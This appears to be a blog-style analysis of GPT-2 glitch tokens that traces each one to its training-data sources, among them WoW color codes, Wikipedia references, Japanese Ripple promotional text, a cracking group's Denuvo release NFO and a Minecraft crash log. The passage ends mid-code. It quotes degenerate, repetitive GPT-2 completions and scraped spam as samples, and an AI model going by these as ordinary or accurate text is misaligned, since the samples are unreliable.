This token was commonly found in World of Warcraft chat and auction scrapes. Both it and "cffffcc" are also parts of hex color codes. GPT2 almost always completes prompts with just "cffffcc" as "cffffcc00" followed by code. "cffffcc00" is hex for yellow, and apparently it's commonly used to color text for WoW notifications?

GPT2 completions from "cffffcc" as prompt

cffffcc00Level 1 - 100 Hat\n\n\nThe Hat\n\n\nLevel 1 - 100 Hat\n\nattach particle effect static (28)\n\n\n( Not Tradable or Marketable )\n\n\nThe Hat\n\nLevel 1 - 100 Hat\n\n\nThe

cffffcc00RANGE Spell Damage - - - - Spell damage increased by 1.4% for every level\n\nBase duration increased by 1.4% every level\n\nDamage increased by 1.4% every level for every level\n\n

cffffcc00Level 1 - 100 Hat\n\n\nThe Scarecrow\n\n\nLevel 1 - 100 Hat\n\n\nThe Scarecrow\n\n\nLevel 1 - 100 Hat\n\n\nThe Scarecrow\n\n\nLevel 1 - 100 Hat\n\n\nThe Scarecrow\n\n

cffffcc00F - Aura of Protection - [|cffffcc00Level 1|r],(1|r) - [|cffffcc00Level 2|r],(2|r) - [|cffffcc00Level 3|r] Researchtip=(|cffffcc

These turned out to be quite similar to chat and hotkey commands for Warcraft and DOTA, and also the exact type of stuff that would get scraped from GitHub. "cffffcc" was not present at all in OpenWebText, although "cffff" was part of various WoW chat log scrapes, where it was used to set text color.
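To make the color-code structure concrete, here is a small parsing sketch. It assumes the `|cAARRGGBB` ... `|r` convention used in Warcraft-family UI text, where `|c` starts a colored span, the next two hex digits are alpha, the following six are RGB, and `|r` resets the color. Under that reading, "cffffcc00" is the marker `c`, alpha `ff`, and the yellow `ffcc00`. The class and function names are hypothetical.

```python
import re
from typing import List, NamedTuple


class ColoredSpan(NamedTuple):
    alpha: int
    rgb: tuple
    text: str


# |c + 2 hex digits of alpha + 6 hex digits of RGB, then text up to the next |r.
COLOR_RE = re.compile(r"\|c([0-9a-fA-F]{2})([0-9a-fA-F]{6})(.*?)\|r", re.DOTALL)


def parse_colored_spans(s: str) -> List[ColoredSpan]:
    """Extract every |cAARRGGBB...|r span as (alpha, (r, g, b), text)."""
    spans = []
    for alpha, rgb, text in COLOR_RE.findall(s):
        r, g, b = (int(rgb[i:i + 2], 16) for i in (0, 2, 4))
        spans.append(ColoredSpan(int(alpha, 16), (r, g, b), text))
    return spans


# Fragment taken from one of the GPT2 completions above.
sample = "[|cffffcc00Level 1|r],(1|r) - [|cffffcc00Level 2|r]"
spans = parse_colored_spans(sample)
for span in spans:
    print(span)
```

Splitting the string this way also suggests why "cffff" and "cffffcc" could become tokens of their own: the same prefix repeats in front of every colored label.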

 

(7131 '][' 20471) and (3693 '.[' 20604) and (42669 ').[' 19013) and (42924 '".[' 19219)

These were interesting as '.[' was the most commonly occurring glitch token (other than \x00, the ASCII null character). It was in 20604/20610 files.

Most were part of references, and most of those were from Wikipedia. The remainder was code, JavaScript if I recall correctly.

Wikipedia Entries

 "The Wretched Automatons" is sung in a variant of English and was recorded prior to the addition of the mechanical sounds that run throughout the track, while "Kainé" is in a version of Gaelic.[2]\n\nSquare Enix released a soundtrack album of music from the game, titled NieR Gestalt & Replicant Original Soundtrack, on April 21, 2010. The two-disc, 2:30:09-long album has the catalog numbers of SQEX-10189/90.[4] As preorder bonuses for Nier Gestalt and Nier Replicant, the two versions of the game released in Japan, two mini-albums, Nier Gestalt Mini Album and Nier Replicant Mini Album, were included. Each one contains five tracks from the full soundtrack album; Gestalt corresponds with tracks 1 and 4 from disc 1, 8 and 13 from disc 2, and an electronic version of "Kainé" titled "Kainé / Rain of Light", while Replicant encompasses track 3 from disc 2, tracks 2 and 7 from disc 1, track 1 from disc 2, and a medley of several tracks.[5][6] Gestalt is 18:11 long, and Replicant 17:11.[5][6] A book of sheet music of piano arrangements of tracks from the game by Okabe was published by KMP on April 22, 2011. The book, NieR Gestalt & Replicant Official Score Book, contains 25 arrangements in 112 pages.[7] Guitar arrangements of "Song of the Ancients / Devola" and "Yonah / Strings Ver." by Yuji Sekiguchi were included in the Square Enix Official Best Collection guitar solo sheet music book, published by KMP in May 2011.[8]\n\nThe soundtrack album reached number 24 on the Japanese Oricon music charts, and remained on the charts for 11 weeks.[9] It was well received by critics; Patrick Gann of RPGFan called the album "an insanely good soundtrack" and noted it as his candidate for video game soundtrack of the year, as well as "one of the best game soundtracks ever". He applauded that the music was both "meticulously-crafted" and "accessible to the untrained ear".[4] Don Kotowski of Square Enix Music Online praised the "captivating vocal work" and "exquisite" composition. 
He also noted that each track retained a sense of individuality even when it reused themes from other tracks.[10] He was less complimentary towards the mini albums, which he regarded as good introductions to the soundtrack as a whole but not worth purchasing on their own.[5][6]

 

31708 ーン 635

"ーン" is often part of transliterated English words. A common example was as part of "ブロックチェーン" (Burokku chēn), which is just the Japanese pronunciation of Blockchain. There was also some stuff about the Rothschilds.

Crypto spam

https://t.co/c5n2VSSs5L — Ripple (@Ripple) 2018年11月15日\n\nタイの銀行\n\nアユタヤ銀行(Krungsri)*\n\nアユタヤ銀行(Bank of Ayudhya/Krungsri)は、タイで5番目に大きい商業銀行です。同行は2017年6月にリップルを採用することを発表しました。\n\n2017年10月にはリップル社から公式に同行が RippleNet に参加することが発表されました。\n\nサイアム商業銀行 *\n\nサイアム商業銀行(Siam Commercial Bank)は、1905年に設立されたタイで最も歴史の古い商業銀行です。主要株主はタイ国財務省、王室財産管理局となっており、王室系の銀行でもあります。サイアム商業銀行は2016年9月にRippleソリューションの採用を表明しました。\n\n日本の銀行\n\n七十七銀行 **\n\n七十七銀行は、宮城 県仙台市に本店を置く東北6県では最大手の大手地方銀行です。同行は2016年10月に SBI Ripple Asia が主導する『ブロックチェーン技術等を活用した国内外為替一元化検討に関するコンソーシアム』への参加を発表しました。\n\nイオン銀行 **\n\nイオン銀行は、セブン銀行とともに『新たな形態の銀行』に分類されるイオングループの銀行。イオングループのほぼすべての店舗にATMを設置しています。同行は2016年10月に SBI Ripple Asia が主導するコンソーシアムへの参加を発表してい ます。\n\n秋田銀行 **\n\n秋田銀行は、秋田県秋田市に本店を置く地方銀行です。同行は2017年5月に SBI Ripple Asia が主導する『ブロックチェーン技術等を活用した国内外為替一元化検討に関するコンソーシアム』への参加を発表しました。\n\n青森銀行 **\n\n青森銀行は、青森県青森市に本店を置く青森県最大の地方銀行です。同行は2016年10月に SBI Ripple Asia が主導する『ブロックチェーン技術等を活用した国内外為替一元化検討に関するコンソーシアム』への参加を発表しまし た。\n\n足利銀行 **\n\n足利銀行は、めぶきフィナンシャルグループ傘下の栃木県宇都宮市に本店を置く地方銀行です。同行は2016年10月に SBI Ripple Asia が主導する『ブロックチェーン技術等を活用した国内外為替一元化検討に関するコンソ ーシアム』への参加を発表しました。\n\n阿波銀行 **\n\n阿波銀行は、徳島県徳島市に本店を置く地方銀行です。同行は2016年10月に SBI Ripple Asia が主導する『ブロックチェーン技術等を活用した国内外為替一元化検討に関するコンソーシア ム』への参加を発表しました。\n\n岩手銀行 **\n\n岩手銀行は、岩手県盛岡市に本店を置く岩手県最大の地方銀行です。同行は2017年4月に SBI Ripple Asia が主導する『ブロックチェーン技術等を活用した国内外為替一元化検討に関するコンソーシアム』への参加を発表しました。\n\n名古屋銀行 **\n\n名古屋銀行は、愛知県名古屋市に本店を置く第二地方銀行です。同行は2017年5月に SBI Ripple Asia が主導する『ブロックチェーン技術等を活用した国内外為替一元化検討に関するコンソーシアム』への参加を発表しました。\n\n沖縄銀行 **\n\n沖縄銀行は、沖縄県那覇市久茂地に本店を置く、信託併営の地方銀行です。同行は2017年4月に SBI Ripple Asia が主導する『ブロックチェーン技術等を活用した国内外為替一元化検討に関するコンソーシアム』への参加を発表しました。\n\n三菱UFJ銀行 *\n\n三菱UFJ銀行は、三菱UFJフィナンシャル・グループ傘下の都市銀行で、日本の3大メガバンクの一つです。同行は2016年11月に発表されたシンガポール中央銀行が主導するリッ プルを利用した国際送金実験に参加しています。また、2017年3月にはリップルを利用する国際送金サービスの世界連合である Global Payments Steering Group(GPSG)への参

Prompting GPT2 with just "ーン" mostly produces content specific to Puzzle & Dragons, referencing キン肉族超人予言書, 裏覚醒, and other common elements in the series. My best guess is that it's another member of the Dragon cluster.

 

 

48396 ÛÛ 3

[494, 155, 494]

It's part of the description text on torrent sites for cracked video games. Whoever wrote this did not think highly of CODEX.

ÛÛ

titled a guest Nov 25th, 2016 5,195 Never a guest5,195Never\n\nNot a member of Pastebin yet? Sign Up , it unlocks many cool features!\n\nrawdownloadcloneembedreportprint text 4.82 KB ßÜÜ ß ÜÜÜÜÜÜ²Ý ÞÛÛÜ ²ÛÜ ßÜ °²²ÛÛÛÛÛÛÛß ÜÛÛÛÛÝÞÛÛÝ Þ² ÜÜÜÜÜÜ Ü ÛßÛÛÛÛÛÛ²°Ü²ÛÛÛÛÛÜÛÛÛ² °ÛÝÜÜÜ Ü ÜÜÜÜÜÜ Û ÞÝÞÝÞÛÛÛÛÛÛÝÞÛÛÛÛÛÛÛÛÛÛÛÛÝ ÛÝ ÞÝ Û Û ² ²ÛÛÛÛÛÛÛÜÛÛÛÛÛÛÛÛÛÛÛÛÝÞÛÛ ² Û Û Ü ÞÝ Þ²ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÜÛÛÛ ÞÝ Ü Û Û ÞÝÞÛ ßßßßß²²ÛÛÛÛÛÛÛÛÛßßß ²²° ÛÝÞÝ Û Û Û°²Ý Ü²Ü ÛÛÛÛÛ° °ÛÝ Þ²°Û Û ÝÜ ÞÝ ÞÛ ß ²²ÜÜÜܲ² ÛÜÜÛÛÛÛÛÛÝ ß ÛÝ ÞÝ ÜÞ ÞÝ ²Ü ß²Ü ÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛ²² Ü²ß Ü² ÞÝ ÝßÜ ßßÜÜ°ßÜ ßß²²ÛÛÛÝ ÞÛ°ÜÜÜÜ ßß Üß°ÜÜßß ÜßÞ Ü Û ßßÜÜ ßßÜßÜ ÛÛÛßßßßßß ²ÛÛÛ° ÜßÜßß ÜÜßß Û ÞÝ Û ß²²Ü ÞÝÞÝ ÜÜÜ ÞÛÛÛÝ ÞÛÛ²ÝÞÝÞÝ Ü²ß Û Ü Ü Üß Û Ü ÞÛÛÝ°Û² ÞÛ²Ý °²ÛÛ² ²Û°ÞÛÜ Û ÞÝ ÞÝ ÜßÜÜß Û ÞÝ ÛÛÞ²Üß ÜÜßßßÛÛÜÜ ßܲÝÞÝ ßÜÜÛ° Üß ÞݲÛÝ ß ÜÜÛ°ÞÛ²ß ÜÛÛÛ ÛÛ²² ²ß ܲÛÛß ÜßÜÜß ²ÛÛÛ² ܲÛÛß ÛÛÝ ²²ÛÛÝ ÞÛÛÛÛÝ ÜßÜÜß ÞÛÛÛÝ ÞݲÛÝ ÞÛÛÛÛÝ ÞÛÛÛÝ Þ²² ÞÛÛÛÛ ÛÛÛÛÛ ÞݲÛÝ °²ÛÛÛ ²ÛÛÛ² ÛÛÛÛÛ °²ÛÛÛ °ÛÛÝ ÜÜÜÜÛÛÛÛÛÛÛÛ ÞÛÛÛÛÝ ²ÛÛÛ² ÜÜÛÛÛ²° ÞÛÛÛÛÝ °ÛÛÛÛÛ ÜÜÛÛÛ²ÞÛÛÝ °ÛÛÛ²²ß ßÛÛÛÛÝ ÛÛÛÛÛ ÞÛÛÛÛÝ°ÛÛÛÛÛÛß ÞÛÛÛÛÛÛÛ² ²²ÛÝ ÞÛÛÛÛݲ²ÛÛÛß ÛÛÛ ²²ÛÛÛ ÜÛÛÛÛÛÛÛÛÛÛÛÛ²²ÛÛÛÛÛÛ²ÞÛÛÛÛÛÝ ÞÛÛÛ°ÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛÛÛÛÛÛÝ °ÛÛÛ ÞÛÛÛÛÝ ²²ÛÛÛÛÝ ÞÛÛÛÛÛÛÛÛ°ÛÛÛÛÛÛÛÛÛÛ ÞÛ²² ÞÛÛÛÛ² ÛÛÛÛ ÞÛÛÛÛÛÛÛÛ ÞÛÛÛ°ÞÛÛÛÛÝ ÞÛÛÛÛÛÛÛ ²ÛÛÛÛÛÛÛ ÞÛÛÛÛÛÛÛÛÛÝ ÛÛÛÝ ÛÛÛÛÛÝ ÛÛÛÛÝÜÛÛÛÛÛÛÛÛÛÝ ÞÛÛÛݲ²ÛÛÛ ÛÛÛÛÛÛ²² ßß²²ÛÛÝ ÛÛÛÛÛÛÛÛÛÛÜÜÛÛÛÝ ÞÛÛÛÛ² ÞÛÛÛÛÛÛÛ²²ß²ÛÛÛÛܲ²ÛÛÛÛÛÛÛÛ ÛÛÛÛÛÝ °ÛÛÛÝ ÞÛÛÛÛ² ßßß²²ÛÛÛÝ ÜÛÛÛÛÛÝ ÞÛÛÛ²²ÛÛÛÜÜÜ°°ßßßÛÛÛÛÛÛÛÛÛÛÜÜÜÛÛÛ²²ß ÞÛÛÛÝ ÜÛÛÛÛÛÝ Û ÞÛÛÛÛÛÛÛÛ²²ß ÛÛÛÛ ßßßÛÛÛÛÜÜÜÜÜ°° ßßßßß nERv ÞÛÛÛÛÛÛÛÛ²²ß Û Þ²²ÛÛÛÛßßß ßßßß ÜßßßÛÛÛÛÛÛ Þ²²ÛÛÛÛßßß Û Û ²²ÛÛ Û Û Û Û ÜßßÛ Üßß ² ÜßßÜ ÜßßÜ ÜßÜ Üßß ÜßÜ Û ÛÜÜÜ Ûß² ²ß Ü Û Û ² Ûßß² ² Û ²ß Ü Û ² ÜÜÜÛ Û ßßßß ßßß ßß ß ßßß ßßßß ßßß Just don\'t ask :..... RELEASE.DATE .. PROTECTION .......: Denuvo x64 0 :.......... DISC(S) .. GAME.TYPE ........: //// Üßß ÜßßÜ ÜßÜßÜ Üßß ß ÜßßÜ ÜßßÜ ÜßßÜ Üß ßßßßßßßßßßßßßßßß Û ß² Ûßß² Û ² ²ß Ü Û Û ² ²ß Û ² ßßßÛ ßßßßßßßßßßßßßßßß ßß ß ß ß ßßßß ß ß ß ßß ßß Notes: ~~~~~~ Just to announce , our team think it\'s time to publish a PROPER Denuvo crack. 
Greets to CPY for "cracking" the games but their so called "crack" was only emulation where they patched the remaining ingame triggers and giving a instruction to the exe to generate a dbdata file. Also we forgot to say: CODEX are just a bunch of idiots who can emulate a Steam DRM. New Year 2017 is ahead of us so expect more soon ;) Greets to 0x0007 and Diam0nd Üßß ÜßßÛ ÜßßÜ ² Ü ÜßßÛ ÜßßÜ ÜßßÜ ²ÜÜ Üßß Üß ßßßßßßßßßßßß Û ß² Ûß² Û ² Û ² Ûßß Û ² Û ² Û Ü ²ß Ü ßßßÛ ßßßßßßßßßßßßß ßß Û ßß ßß ß ß ßß ßßß ßßßß ßß https://google.com/patents/EP2998895A1\n\nRAW Paste Data\n\nßÜÜ ß ÜÜÜÜÜÜ²Ý ÞÛÛÜ ²ÛÜ ßÜ °²²ÛÛÛÛÛÛÛß ÜÛÛÛÛÝÞÛÛÝ Þ² ÜÜÜÜÜÜ Ü ÛßÛÛÛÛÛÛ²°Ü²ÛÛÛÛÛÜÛÛÛ² °ÛÝÜÜÜ Ü ÜÜÜÜÜÜ Û ÞÝÞÝÞÛÛÛÛÛÛÝÞÛÛÛÛÛÛÛÛÛÛÛÛÝ ÛÝ ÞÝ Û Û ² ²ÛÛÛÛÛÛÛÜÛÛÛÛÛÛÛÛÛÛÛÛÝÞÛÛ ² Û Û Ü ÞÝ Þ²ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÜÛÛÛ ÞÝ Ü Û Û ÞÝÞÛ ßßßßß²²ÛÛÛÛÛÛÛÛÛßßß ²²° ÛÝÞÝ Û Û Û°²Ý Ü²Ü ÛÛÛÛÛ° °ÛÝ Þ²°Û Û ÝÜ ÞÝ ÞÛ ß ²²ÜÜÜܲ² ÛÜÜÛÛÛÛÛÛÝ ß ÛÝ ÞÝ ÜÞ ÞÝ ²Ü ß²Ü ÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛ²² Ü²ß Ü² ÞÝ ÝßÜ ßßÜÜ°ßÜ ßß²²ÛÛÛÝ ÞÛ°ÜÜÜÜ ßß Üß°ÜÜßß ÜßÞ Ü Û ßßÜÜ ßßÜßÜ ÛÛÛßßßßßß ²ÛÛÛ° ÜßÜßß ÜÜßß Û ÞÝ Û ß²²Ü ÞÝÞÝ ÜÜÜ ÞÛÛÛÝ ÞÛÛ²ÝÞÝÞÝ Ü²ß Û Ü Ü Üß Û Ü ÞÛÛÝ°Û² ÞÛ²Ý °²ÛÛ² ²Û°ÞÛÜ Û ÞÝ ÞÝ ÜßÜÜß Û ÞÝ ÛÛÞ²Üß ÜÜßßßÛÛÜÜ ßܲÝÞÝ ßÜÜÛ° Üß ÞݲÛÝ ß ÜÜÛ°ÞÛ²ß ÜÛÛÛ ÛÛ²² ²ß ܲÛÛß ÜßÜÜß ²ÛÛÛ² ܲÛÛß ÛÛÝ ²²ÛÛÝ ÞÛÛÛÛÝ ÜßÜÜß ÞÛÛÛÝ ÞݲÛÝ ÞÛÛÛÛÝ ÞÛÛÛÝ Þ²² ÞÛÛÛÛ ÛÛÛÛÛ ÞݲÛÝ °²ÛÛÛ ²ÛÛÛ² ÛÛÛÛÛ °²ÛÛÛ °ÛÛÝ ÜÜÜÜÛÛÛÛÛÛÛÛ ÞÛÛÛÛÝ ²ÛÛÛ² ÜÜÛÛÛ²° ÞÛÛÛÛÝ °ÛÛÛÛÛ ÜÜÛÛÛ²ÞÛÛÝ °ÛÛÛ²²ß ßÛÛÛÛÝ ÛÛÛÛÛ ÞÛÛÛÛÝ°ÛÛÛÛÛÛß ÞÛÛÛÛÛÛÛ² ²²ÛÝ ÞÛÛÛÛݲ²ÛÛÛß ÛÛÛ ²²ÛÛÛ ÜÛÛÛÛÛÛÛÛÛÛÛÛ²²ÛÛÛÛÛÛ²ÞÛÛÛÛÛÝ ÞÛÛÛ°ÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛÛÛÛÛÛÝ °ÛÛÛ ÞÛÛÛÛÝ ²²ÛÛÛÛÝ ÞÛÛÛÛÛÛÛÛ°ÛÛÛÛÛÛÛÛÛÛ ÞÛ²² ÞÛÛÛÛ² ÛÛÛÛ ÞÛÛÛÛÛÛÛÛ ÞÛÛÛ°ÞÛÛÛÛÝ ÞÛÛÛÛÛÛÛ ²ÛÛÛÛÛÛÛ ÞÛÛÛÛÛÛÛÛÛÝ ÛÛÛÝ ÛÛÛÛÛÝ ÛÛÛÛÝÜÛÛÛÛÛÛÛÛÛÝ ÞÛÛÛݲ²ÛÛÛ ÛÛÛÛÛÛ²² ßß²²ÛÛÝ ÛÛÛÛÛÛÛÛÛÛÜÜÛÛÛÝ ÞÛÛÛÛ² ÞÛÛÛÛÛÛÛ²²ß²ÛÛÛÛܲ²ÛÛÛÛÛÛÛÛ ÛÛÛÛÛÝ °ÛÛÛÝ ÞÛÛÛÛ² ßßß²²ÛÛÛÝ ÜÛÛÛÛÛÝ ÞÛÛÛ²²ÛÛÛÜÜÜ°°ßßßÛÛÛÛÛÛÛÛÛÛÜÜÜÛÛÛ²²ß ÞÛÛÛÝ ÜÛÛÛÛÛÝ Û ÞÛÛÛÛÛÛÛÛ²²ß ÛÛÛÛ ßßßÛÛÛÛÜÜÜÜÜ°° ßßßßß nERv ÞÛÛÛÛÛÛÛÛ²²ß Û Þ²²ÛÛÛÛßßß ßßßß ÜßßßÛÛÛÛÛÛ Þ²²ÛÛÛÛßßß Û Û ²²ÛÛ Û Û Û Û ÜßßÛ Üßß ² ÜßßÜ ÜßßÜ ÜßÜ Üßß ÜßÜ Û ÛÜÜÜ Ûß² ²ß Ü Û Û ² Ûßß² ² Û ²ß Ü Û ² ÜÜÜÛ Û ßßßß ßßß ßß ß ßßß 
ßßßß ßßß Just don\'t ask :..... RELEASE.DATE .. PROTECTION .......: Denuvo x64 0 :.......... DISC(S) .. GAME.TYPE ........: //// Üßß ÜßßÜ ÜßÜßÜ Üßß ß ÜßßÜ ÜßßÜ ÜßßÜ Üß ßßßßßßßßßßßßßßßß Û ß² Ûßß² Û ² ²ß Ü Û Û ² ²ß Û ² ßßßÛ ßßßßßßßßßßßßßßßß ßß ß ß ß ßßßß ß ß ß ßß ßß Notes: ~~~~~~ Just to announce , our team think it\'s time to publish a PROPER Denuvo crack. Greets to CPY for "cracking" the games but their so called "crack" was only emulation where they patched the remaining ingame triggers and giving a instruction to the exe to generate a dbdata file. Also we forgot to say: CODEX are just a bunch of idiots who can emulate a Steam DRM. New Year 2017 is ahead of us so expect more soon ;) Greets to 0x0007 and Diam0nd Üßß ÜßßÛ ÜßßÜ ² Ü ÜßßÛ ÜßßÜ ÜßßÜ ²ÜÜ Üßß Üß ßßßßßßßßßßßß Û ß² Ûß² Û ² Û ² Ûßß Û ² Û ² Û Ü ²ß Ü ßßßÛ ßßßßßßßßßßßßß ßß Û ßß ßß ß ß ßß ßßß ßßßß ßß https://google.com/patents/EP2998895A1

 

24440 ュ 1338

 "通常のプレビュ" (preview) is present on every post on 2ch, a popular Japanese imageboard. 

Also, 天空龍ラッシュ! (Skydragon) is a location in P&D (Puzzle & Dragons), so add another to the Dragon cluster.

 

39165 catentry 4

[194, 180, 73, 9]

 "Attributes" : { "size_20":"2", "color_Marine":"1" } }, { "catentry_id" : "10277803", "channelAvailability" : "BuyableInstoreAndOnline", "inventoryQuantity" : 

 "Attributes" : { "size_16":"2", "color_Marine":"1" } }, { "catentry_id" : "10277804", "channelAvailability" : "BuyableInstoreAndOnline", "inventoryQuantity" : "22.0", 

It's a JSON-style format for inventory management.

 

39253  UCHIJ 5

[340, 262, 234, 36, 8]

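Always part of the string "UCHIJAAAA", which prefixes each entry in the mod list of Minecraft (Forge) crash logs. Going by the legend printed in the log itself, each letter is a mod loading state ('U' = Unloaded, 'C' = Constructed, and so on).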

UCHIJAAAA


---- Minecraft Crash Report ---- WARNING: coremods are present: LoadingPlugin (Quark-r1.0-59.jar) ChiselCorePlugin (Chisel-MC1.10.2-0.0.7.3.jar) DepLoader (BrandonsCore-1.10.2-2.1.1.61-universal.jar) LoadingHook (Mekanism-1.10.2-9.2.0.294.jar) FMLPlugin (InventoryTweaks-1.62-dev-66.jar) BookshelfLoadingPlugin (Bookshelf-1.10.2-1.4.2.335.jar) ForgelinPlugin (Forgelin-1.1.0.jar) LoadingPlugin (RandomThings-MC1.10.2-3.7.7.jar) LoadingPlugin (ResourceLoader-MC1.9.4-1.5.1.jar) AppleCore (AppleCore-mc1.10.2-2.1.0.jar) TransformerLoader (OpenComputers-MC1.10.2-1.6.0.4.jar) CoreMod (Aroma1997Core-1.9.4-1.1.1.0.jar) AppEngCore (appliedenergistics2-rv4-alpha-6.jar) IC2core (industrialcraft-2-2.6.105-ex110.jar) ShetiPhian-ASM (shetiphiancore-1.10.0-3.3.4.jar) DepLoader (CodeChickenCore-1.10.2-2.3.5.91-universal.jar) LoadingPlugin (Bloodmoon-MC1.9.4-1.4.1.jar) MalisisCorePlugin (malisiscore-1.10.2-4.2.7.jar) Default Options (DefaultOptions_1.10.2-6.1.5.jar) EnderCorePlugin (EnderCore-1.10.2-0.4.1.58-beta.jar) CCLCorePlugin (CodeChickenLib-1.10.2-2.4.1.101-universal.jar) CCLCorePlugin (CodeChickenLib-1.10.2-2.4.3.124-universal.jar) Contact their authors BEFORE contacting forge // Shall we play a game? 
Time: 11/19/16 12:32 PM Description: Ticking player java.lang.IllegalArgumentException: Cannot set property PropertyDirection{name=facing, clazz=class net.minecraft.util.EnumFacing, values=[down, up, north, south, west, east]} to null on block minecraft:piston, it is not an allowed value at net.minecraft.block.state.BlockStateContainer$StateImplementation.func_177226_a(BlockStateContainer.java:229) at net.minecraft.block.BlockPistonBase.func_176203_a(BlockPistonBase.java:424) at biomesoplenty.common.handler.AchievementEventHandler.onItemPickup(AchievementEventHandler.java:59) at net.minecraftforge.fml.common.eventhandler.ASMEventHandler_221_AchievementEventHandler_onItemPickup_ItemPickupEvent.invoke(.dynamic) at net.minecraftforge.fml.common.eventhandler.ASMEventHandler.invoke(ASMEventHandler.java:90) at net.minecraftforge.fml.common.eventhandler.EventBus.post(EventBus.java:185) at net.minecraftforge.fml.common.FMLCommonHandler.firePlayerItemPickupEvent(FMLCommonHandler.java:580) at net.minecraft.entity.item.EntityItem.func_70100_b_(EntityItem.java:410) at net.minecraft.entity.player.EntityPlayer.func_71044_o(EntityPlayer.java:578) at net.minecraft.entity.player.EntityPlayer.func_70636_d(EntityPlayer.java:570) at net.minecraft.entity.EntityLivingBase.func_70071_h_(EntityLivingBase.java:2013) at net.minecraft.entity.player.EntityPlayer.func_70071_h_(EntityPlayer.java:233) at net.minecraft.entity.player.EntityPlayerMP.func_71127_g(EntityPlayerMP.java:303) at net.minecraft.network.NetHandlerPlayServer.func_73660_a(NetHandlerPlayServer.java:162) at net.minecraftforge.fml.common.network.handshake.NetworkDispatcher$1.func_73660_a(NetworkDispatcher.java:213) at net.minecraft.network.NetworkManager.func_74428_b(NetworkManager.java:287) at net.minecraft.network.NetworkSystem.func_151269_c(NetworkSystem.java:180) at net.minecraft.server.MinecraftServer.func_71190_q(MinecraftServer.java:732) at net.minecraft.server.MinecraftServer.func_71217_p(MinecraftServer.java:613) at 
net.minecraft.server.integrated.IntegratedServer.func_71217_p(IntegratedServer.java:240) at net.minecraft.server.MinecraftServer.run(MinecraftServer.java:471) at java.lang.Thread.run(Thread.java:745) A detailed walkthrough of the error, its code path and all known details is as follows: --------------------------------------------------------------------------------------- -- Head -- Thread: Server thread Stacktrace: at net.minecraft.block.state.BlockStateContainer$StateImplementation.func_177226_a(BlockStateContainer.java:229) at net.minecraft.block.BlockPistonBase.func_176203_a(BlockPistonBase.java:424) at biomesoplenty.common.handler.AchievementEventHandler.onItemPickup(AchievementEventHandler.java:59) at net.minecraftforge.fml.common.eventhandler.ASMEventHandler_221_AchievementEventHandler_onItemPickup_ItemPickupEvent.invoke(.dynamic) at net.minecraftforge.fml.common.eventhandler.ASMEventHandler.invoke(ASMEventHandler.java:90) at net.minecraftforge.fml.common.eventhandler.EventBus.post(EventBus.java:185) at net.minecraftforge.fml.common.FMLCommonHandler.firePlayerItemPickupEvent(FMLCommonHandler.java:580) at net.minecraft.entity.item.EntityItem.func_70100_b_(EntityItem.java:410) at net.minecraft.entity.player.EntityPlayer.func_71044_o(EntityPlayer.java:578) at net.minecraft.entity.player.EntityPlayer.func_70636_d(EntityPlayer.java:570) at net.minecraft.entity.EntityLivingBase.func_70071_h_(EntityLivingBase.java:2013) at net.minecraft.entity.player.EntityPlayer.func_70071_h_(EntityPlayer.java:233) -- Player being ticked -- Details: Entity Type: null (net.minecraft.entity.player.EntityPlayerMP) Entity ID: 402 Entity Name: desagas Entity's Exact location: 157.03, 46.00, -15.45 Entity's Block location: World: (157,46,-16), Chunk: (at 13,2,0 in 9,-1; contains blocks 144,0,-16 to 159,255,-1), Region: (0,-1; contains chunks 0,-32 to 31,-1, blocks 0,0,-512 to 511,255,-1) Entity's Momentum: 0.00, -0.08, 0.00 Entity's Passengers: [] Entity's Vehicle: ~~ERROR~~ 
NullPointerException: null Stacktrace: at net.minecraft.entity.player.EntityPlayerMP.func_71127_g(EntityPlayerMP.java:303) at net.minecraft.network.NetHandlerPlayServer.func_73660_a(NetHandlerPlayServer.java:162) at net.minecraftforge.fml.common.network.handshake.NetworkDispatcher$1.func_73660_a(NetworkDispatcher.java:213) at net.minecraft.network.NetworkManager.func_74428_b(NetworkManager.java:287) -- Ticking connection -- Details: Connection: net.minecraft.network.NetworkManager@5881f033 Stacktrace: at net.minecraft.network.NetworkSystem.func_151269_c(NetworkSystem.java:180) at net.minecraft.server.MinecraftServer.func_71190_q(MinecraftServer.java:732) at net.minecraft.server.MinecraftServer.func_71217_p(MinecraftServer.java:613) at net.minecraft.server.integrated.IntegratedServer.func_71217_p(IntegratedServer.java:240) at net.minecraft.server.MinecraftServer.run(MinecraftServer.java:471) at java.lang.Thread.run(Thread.java:745) -- System Details -- Details: Minecraft Version: 1.10.2 Operating System: Windows 10 (amd64) version 10.0 Java Version: 1.8.0_25, Oracle Corporation Java VM Version: Java HotSpot(TM) 64-Bit Server VM (mixed mode), Oracle Corporation Memory: 902588632 bytes (860 MB) / 7239892992 bytes (6904 MB) up to 11453595648 bytes (10923 MB) JVM Flags: 4 total; -XX:HeapDumpPath=MojangTricksIntelDriversForPerformance_javaw.exe_minecraft.exe.heapdump -Xmx12288m -Xms256m -XX:PermSize=256m IntCache: cache: 0, tcache: 9, allocated: 1, tallocated: 93 FML: MCP 9.32 Powered by Forge 12.18.2.2125 Optifine OptiFine_1.10.2_HD_U_D2 170 mods loaded, 170 mods active States: 'U' = Unloaded 'L' = Loaded 'C' = Constructed 'H' = Pre-initialized 'I' = Initialized 'J' = Post-initialized 'A' = Available 'D' = Disabled 'E' = Errored UCHIJAAAA mcp{9.19} [Minecraft Coder Pack] (minecraft.jar) UCHIJAAAA FML{8.0.99.99} [Forge Mod Loader] (forge-1.10.2-12.18.2.2125.jar) UCHIJAAAA Forge{12.18.2.2125} [Minecraft Forge] (forge-1.10.2-12.18.2.2125.jar) UCHIJAAAA 
appliedenergistics2-core{rv4-alpha-6} [Applied Energistics 2 Core] (minecraft.jar) UCHIJAAAA Aroma1997Core{${version}} [Aroma1997Core] (Aroma1997Core-1.9.4-1.1.1.0.jar) UCHIJAAAA OpenComputers|Core{1.6.0.4} [OpenComputers (Core)] (minecraft.jar) UCHIJAAAA mantle{1.10.2-1.1.1.194} [Mantle]
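The "States:" legend in the crash log above suggests how to read the string: each letter records one loading state. Here is a minimal Python sketch that expands a state string using that legend. The helper name `expand_states` is made up for illustration, and the mapping is copied from the log itself, not from Forge documentation.

```python
# Legend copied from the "States:" line of the crash log above.
FORGE_STATES = {
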